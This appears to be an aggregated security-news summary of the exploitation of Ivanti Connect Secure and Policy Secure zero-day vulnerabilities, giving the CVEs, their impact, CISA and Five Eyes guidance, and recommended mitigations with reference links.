Threat actors have been actively exploiting multiple Ivanti Zero-Day vulnerabilities, impacting Ivanti Connect Secure (ICS) [7], Ivanti Policy Secure (IPS) [1] [4] [6] [7] [9], and ZTA gateways globally [4].
Description
Threat actors have been exploiting Ivanti Zero-Day vulnerabilities [10], including CVE-2023-46805 [4] [8] [9] [11], CVE-2024-21887 [1] [2] [3] [4] [6] [7] [8] [9] [10] [11], and CVE-2024-21893 [1] [2] [3] [4] [6] [7] [8] [9] [11], allowing them to bypass authentication [2] [9], execute arbitrary commands with elevated privileges [1] [2] [6] [8] [9] [11], and engage in malicious activities [10]. Volexity researchers linked the exploitation to a Chinese nation-state actor [7]. Additional vulnerabilities were identified, including CVE-2024-22024 and CVE-2024-21888. CISA confirmed the exploitation and advised Federal Civilian Executive Branch agencies to disconnect ICS and IPS devices [7]. Organizations are advised to assume compromised credentials, hunt for malicious activity [1] [6], and apply patching guidance [1] [2] [6]. Ivanti’s Integrity Checker Tool (ICT) may not be reliable in compromised situations [2]. CISA and Five Eyes agencies issued detection methods, indicators of compromise [9] [11], and mitigation guidance [4] [11]. Industry partners reported on the widespread exploitation of these vulnerabilities [8] [11]. Cybersecurity professionals and threat actors identified zero-day vulnerabilities in Ivanti products [5], allowing unauthorized access to networks [5]. CISA warns that these vulnerabilities are actively exploited and advises users to patch and update their devices [5]. Organizations should keep operating systems and firmware up to date to mitigate risks [5]. CEO of Xage Security highlighted inherent weaknesses in key security products [10], particularly legacy VPNs [10]. Exploits for CVE-2023-46805 [3], CVE-2024-21887 [1] [2] [3] [4] [6] [7] [8] [9] [10] [11], and CVE-2024-21893 have been observed [3], leading to the installation of the ‘DSLog’ backdoor on over 670 IT infrastructures [3].
Conclusion
Organizations should take immediate action to patch vulnerabilities, limit outbound internet connections from SSL VPN [5], restrict access to required services [5], and implement a ‘least privileged’ approach for all accounts [5]. Continuous monitoring and security updates are crucial to mitigate risks associated with these exploits. Sophisticated threat actors may have deployed rootkit level persistence on compromised devices [1] [5], remaining undetected for extended periods [5]. It is essential for users to stay vigilant and proactive in protecting their systems from potential threats.
References
[1] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b
[2] https://www.infosecurity-magazine.com/news/five-eyes-warn-ivanti/
[3] https://vulners.com/hivepro/HIVEPRO:BF72098E6E2F75D4E00C6F5597E32038
[4] https://www.computerweekly.com/feature/Ivanti-vulnerabilities-explained-Everything-you-need-to-know
[5] https://expel.com/blog/security-alert-ivanti-connect-secure-and-policy-secure-zero-day-vulnerabilities/
[6] https://dig.watch/updates/intelligence-advisory-cyber-threat-actors-exploit-vulnerabilities-in-ivanti-gateways
[7] https://www.techtarget.com/searchSecurity/news/366571739/CISA-warns-Ivanti-ICT-ineffective-for-detecting-compromises
[8] https://www.redpacketsecurity.com/cisa-cisa-and-partners-release-advisory-on-threat-actors-exploiting-ivanti-connect-secure-and-policy-secure-gateways-vulnerabilities-04-03-2024/
[9] https://securityaffairs.com/159807/hacking/fiveeye-warns-ivanti-gateways-attacks.html
[10] https://www.cybersecuritydive.com/news/ivanti-exploit-warnings-global-five-eyes/708996/
[11] https://www.cisa.gov/news-events/alerts/2024/02/29/cisa-and-partners-release-advisory-threat-actors-exploiting-ivanti-connect-secure-and-policy-secure
